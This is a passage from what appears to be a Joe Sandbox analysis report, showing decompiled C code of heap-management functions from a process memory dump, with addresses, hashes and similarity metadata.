										_t160 = _t160 + (_t156 >> 0xc);
										__eflags = _t160;
									}
									__eflags = _t160;
									if(_t160 != 0) {
										asm("lock xadd [eax], esi");
									}
									_push(_t137);
									_t156 = _t137;
									E0378DEF6(_t124, _t137, _t137, _v28);
									asm("lock inc dword [eax+0x20]");
									asm("lock xadd [eax], ecx");
									_t161 = _t124;
									_t124 = 0;
									__eflags = 0;
									goto L38;
								} else {
									 *0x37bb1e0( *_t159, _t124, _t156);
									_t110 =  *( *(_t159 + 0xc) ^  *0x37b6110 ^ _t159)();
									__eflags = _t110;
									if(_t110 >= 0) {
										_t160 = _v24;
										_t156 = _v12;
										goto L33;
									}
									_t161 = 0;
									L38:
									_v12 = _t161;
									__eflags = _t124;
									if(_t124 != 0) {
										_t164 =  *(_t159 + 8) ^  *0x37b6110 ^ _t159;
										__eflags = _t164;
										 *0x37bb1e0( *_t159, _t124, _v20, _a4);
										 *_t164();
										_t161 = _v12;
									}
									L40:
									if(_v32 == 0) {
										E036EFA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
									}
									return E0370B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
								}
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L25;
							}
							_t156 = _v20;
							_v12 = _t156;
							goto L26;
						}
						_t161 = 0;
						goto L40;
					}
				}
				_t146 = _v36;
				if(_v32 > _v36 >> 6) {
					goto L11;
				}
				_t118 = E0378A359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
				_t147 = _t118;
				_v16 = _t118;
				if(_t147 <= 0xc) {
					_t147 = 0xc;
					_v16 = _t147;
				}
				_t88 = 1;
				_t156 = 1 << _t147;
				if(_t123 > 1) {
					_v20 = 1;
				}
				goto L12;
			}

0x0378d625
0x0378d629
0x0378d62d
0x0378d62f
0x0378d632
0x0378d638
0x0378d63f
0x0378d641
0x0378d64c
0x0378d64f
0x0378d660
0x0378d651
0x0378d659
0x0378d659
0x0378d667
0x0378d66e
0x0378d67c
0x0378d69a
0x0378d6a0
0x0378d6a5
0x0378d6a7
0x0378d6ad
0x0378d6b1
0x0378d6b2
0x0378d6b2
0x0378d6b8
0x0378d6c1
0x0378d6c4
0x0378d6fb
0x0378d6fd
0x0378d6fd
0x0378d6fe
0x0378d701
0x0378d703
0x0378d706
0x0378d70c
0x0378d70c
0x0378d717
0x0378d71a
0x0378d720
0x0378d72d
0x0378d722
0x0378d727
0x0378d729
0x0378d729
0x0378d731
0x0378d76a
0x0378d76a
0x00000000
0x0378d733
0x0378d749
0x0378d751
0x0378d755
0x0378d75e
0x0378d760
0x0378d76c
0x0378d76c
0x0378d773
0x0378d776
0x0378d786
0x0378d78c
0x0378d791
0x0378d793
0x0378d796
0x0378d796
0x0378d799
0x0378d79b
0x0378d79d
0x0378d7a1
0x0378d7a5
0x0378d7a5
0x0378d7a8
0x0378d7aa
0x0378d7aa
0x0378d7a1
0x0378d7ad
0x0378d7af
0x0378d7d8
0x0378d7d8
0x0378d7db
0x0378d7dd
0x0378d7e4
0x0378d7e4
0x0378d7e4
0x0378d7e6
0x0378d7e8
0x0378d7f0
0x0378d7f0
0x0378d7f4
0x0378d7f9
0x0378d7fd
0x0378d805
0x0378d810
0x0378d814
0x0378d816
0x0378d816
0x00000000
0x0378d7b1
0x0378d7c2
0x0378d7c8
0x0378d7ca
0x0378d7cc
0x0378d7d2
0x0378d7d5
0x00000000
0x0378d7d5
0x0378d7ce
0x0378d818
0x0378d818
0x0378d81b
0x0378d81d
0x0378d831
0x0378d831
0x0378d835
0x0378d83b
0x0378d83d
0x0378d83d
0x0378d840
0x0378d844
0x0378d84a
0x0378d84a
0x0378d861
0x0378d861
0x0378d7af
0x0378d778
0x0378d77c
0x00000000
0x00000000
0x0378d77e
0x0378d781
0x00000000
0x0378d781
0x0378d757
0x00000000
0x0378d757
0x0378d731
0x0378d6c6
0x0378d6d1
0x00000000
0x00000000
0x0378d6d6
0x0378d6db
0x0378d6dd
0x0378d6e3
0x0378d6e7
0x0378d6e8
0x0378d6e8
0x0378d6ed
0x0378d6f0
0x0378d6f4
0x0378d6f6
0x0378d6f6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10fbaa7084608c023120ce447540be1a182ba0357a7d51aa44ca9cb241e9aae9
Instruction ID: 5d127c4dea9bac27a8617f4d9bb03d24a425e9d49f8ba86abd8d5429e80f63c6
Opcode Fuzzy Hash: 10fbaa7084608c023120ce447540be1a182ba0357a7d51aa44ca9cb241e9aae9
Instruction Fuzzy Hash: F881A471E4021A9FCB24EFA8D8446AEBBF5FF48310F19816DD915EB280EB749911CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0377FA2B Relevance: .2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 25%

			E0377FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x37a0e38);
				_t98 = E0371D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x37b7bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x377fcfb) & 0x000000ff) * 4 +  &M0377FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E0378A80D(_t168);
				}
				return E0371D0D1(_t98);
			}

0x0377fa2b
0x0377fa2b
0x0377fa2d
0x0377fa32
0x0377fa37
0x0377fa3a
0x0377fa3c
0x0377fa43
0x0377fa46
0x0377fa49
0x0377fa4f
0x0377fa55
0x0377fa58
0x0377fa5d
0x0377fa65
0x0377fa6d
0x0377fa72
0x0377fa78
0x0377fa7e
0x0377fa8c
0x0377faa2
0x0377faa7
0x0377faaa
0x0377faaf
0x0377fac4
0x0377fab1
0x0377fac0
0x0377fac0
0x0377fac8
0x0377facb
0x0377fad5
0x0377fadb
0x0377fae1
0x0377fb05
0x0377fb05
0x0377fb08
0x0377fb0b
0x0377fb15
0x0377fb98
0x0377fb9f
0x0377fba5
0x0377fbb4
0x0377fbb6
0x0377fbb7
0x0377fbbd
0x00000000
0x0377fbbd
0x0377fb17
0x0377fb17
0x0377fb17
0x0377fb1a
0x0377fb22
0x0377fb40
0x0377fb47
0x0377fb4c
0x0377fb4e
0x0377fb54
0x0377fb5a
0x0377fb5a
0x0377fb60
0x0377fb66
0x0377fb6d
0x0377fb70
0x0377fb73
0x0377fb78
0x0377fb7d
0x0377fb8c
0x0377fb90
0x0377fbbf
0x0377fbbf
0x0377fbc6
0x0377fbcd
0x0377fc18
0x0377fc18
0x0377fc23
0x0377fc3d
0x0377fc3d
0x0377fc25
0x0377fc25
0x0377fc2b
0x0377fc2d
0x0377fc33
0x00000000
0x00000000
0x0377fc33
0x0377fbcf
0x0377fbd9
0x0377fbdf
0x0377fc00
0x0377fc06
0x0377fbe1
0x0377fbe1
0x0377fbe3
0x0377fbe9
0x0377fbf5
0x0377fbeb
0x0377fbee
0x0377fbf0
0x0377fbf0
0x0377fbf7
0x0377fbfb
0x0377fc09
0x0377fc10
0x0377fc16
0x00000000
0x00000000
0x0377fc16
0x0377fbcd
0x0377fb7d
0x0377fb60
0x0377fb54
0x0377fb22
0x0377fae3
0x0377fae3
0x0377faed
0x00000000
0x00000000
0x0377faed
0x0377fae1
0x0377fad5
0x0377fa8c
0x0377fc44
0x0377fc72
0x0377fc7c
0x0377fc82
0x0377fc82
0x0377fc84
0x0377fc8a
0x0377fcca
0x0377fcca
0x0377fccb
0x0377fccc
0x0377fccf
0x0377fcd0
0x00000000
0x0377fc8c
0x0377fc93
0x00000000
0x0377fc9a
0x0377fc9b
0x0377fc9c
0x0377fc9f
0x0377fca0
0x00000000
0x00000000
0x0377fca4
0x0377fca5
0x0377fca6
0x0377fca9
0x0377fcaa
0x00000000
0x00000000
0x0377fcae
0x0377fcaf
0x0377fcb0
0x0377fcb2
0x0377fcb3
0x00000000
0x00000000
0x0377fcb7
0x0377fcb8
0x0377fcb9
0x0377fcbc
0x0377fcbd
0x00000000
0x00000000
0x0377fcc1
0x0377fcc2
0x0377fcc3
0x0377fcc5
0x0377fcc6
0x0377fcd2
0x00000000
0x00000000
0x00000000
0x00000000
0x0377fc93
0x0377fcd3
0x0377fcd5
0x0377fcd5
0x0377fcdf

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cca1ff9efd9b212d78fede53d3fe77e03f6fc6f20e7495eb106858e8d856213
Instruction ID: eb5b3029641f5b1c10c289ace7e43bbb4b68d57e6fec33cbac4e673f77ed12ef
Opcode Fuzzy Hash: 7cca1ff9efd9b212d78fede53d3fe77e03f6fc6f20e7495eb106858e8d856213
Instruction Fuzzy Hash: 10818CB09042469FDF18DF69C690ABEFBF5FF08304F18819AE855AB281D3749881DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0378DBD2 Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0378DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x37b6114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L0378D016(_t119, _t183, _t119, _t78);
									E036DFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E0378C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x36aaff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E036DFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E0378E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x36aaff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0370D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E0378D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E0378D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E0378A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}

0x0378dbdc
0x0378dbde
0x0378dbe1
0x0378dbed
0x0378dbef
0x0378dbf7
0x0378dbfd
0x0378dc00
0x0378dc04
0x0378dc07
0x0378dc0c
0x0378dd1f
0x0378dd1f
0x0378dd23
0x0378dd26
0x0378dd29
0x0378dd29
0x0378dd2c
0x0378dd32
0x0378dd35
0x00000000
0x0378dd38
0x0378dd3a
0x0378dd5d
0x0378dd63
0x0378dd69
0x0378dd6e
0x0378dd71
0x0378dd78
0x0378dd7d
0x0378dd8c
0x0378dd9e
0x0378dda0
0x0378ddad
0x0378ddb0
0x0378ddb5
0x0378ddb9
0x0378ddd9
0x0378ddd9
0x0378ddde
0x0378dde0
0x0378dde3
0x0378dde5
0x0378dde9
0x0378dde9
0x0378ddee
0x0378ddf6
0x0378ddf6
0x0378dd97
0x00000000
0x00000000
0x0378dd9b
0x00000000
0x0378dd9b
0x0378dd7f
0x00000000
0x0378dd7f
0x0378dd3f
0x0378dd54
0x0378dd58
0x0378dd86
0x00000000
0x0378dd86
0x00000000
0x0378dd5a
0x0378dd5a
0x0378dd5a
0x00000000
0x0378dd5a
0x0378dd3f
0x0378dd38
0x0378dc12
0x0378dc15
0x0378dc25
0x0378dc31
0x0378dc34
0x0378dc3b
0x0378dc3e
0x0378dc40
0x0378dc43
0x0378dc46
0x0378dc62
0x0378dc6b
0x0378dc6d
0x0378dc48
0x0378dc4b
0x0378dc59
0x0378dc5c
0x0378dc5c
0x0378dc72
0x0378dc78
0x0378dc7f
0x0378dc81
0x0378dc81
0x0378dc84
0x0378dc88
0x0378dc8d
0x0378dc95
0x0378dc9b
0x0378dca0
0x0378dca2
0x0378dca6
0x0378dca6
0x0378dcb0
0x0378dcd1
0x0378dcd4
0x0378dcda
0x0378dcec
0x0378dcf1
0x0378dcf6
0x0378dd0c
0x0378dd1a
0x0378dd1a
0x0378dcf6
0x00000000
0x0378dcda
0x0378dcb5
0x0378dcb6
0x0378dcc5
0x0378dcca
0x0378dcca

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b8aa4e386ac768775f64e3cecd22914c7778b88686ecb8b3691b6b0e83ed69
Instruction ID: cc4fddf874378ce462e136d94bce85f8f765f5d9fbfbbac221fa629b5b27d437
Opcode Fuzzy Hash: 36b8aa4e386ac768775f64e3cecd22914c7778b88686ecb8b3691b6b0e83ed69
Instruction Fuzzy Hash: 7B71FA75E402299FCF24EF69C8809BEB7F5EF88314B14416AE855EB384DA34D941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 037928EC Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E037928EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E036E2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x37b6110; // 0x16cffc9d
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x37b6110; // 0x16cffc9d
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E037925DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E036DFFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x37b6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E03792506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E036DFFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0370FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E0378A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E036DFFB0(_t115, _t145, _t147);
							}
							_t104 = E03793149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E036E2280(_t104, _t147);
								}
								_v5 = 0xff;
								E03792876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}

0x037928f5
0x037928fa
0x037928fe
0x03792900
0x03792906
0x03792908
0x03792908
0x0379290e
0x03792915
0x03792918
0x0379291b
0x0379291d
0x03792920
0x03792920
0x03792929
0x0379292c
0x0379292f
0x03792932
0x03792935
0x03792938
0x0379293d
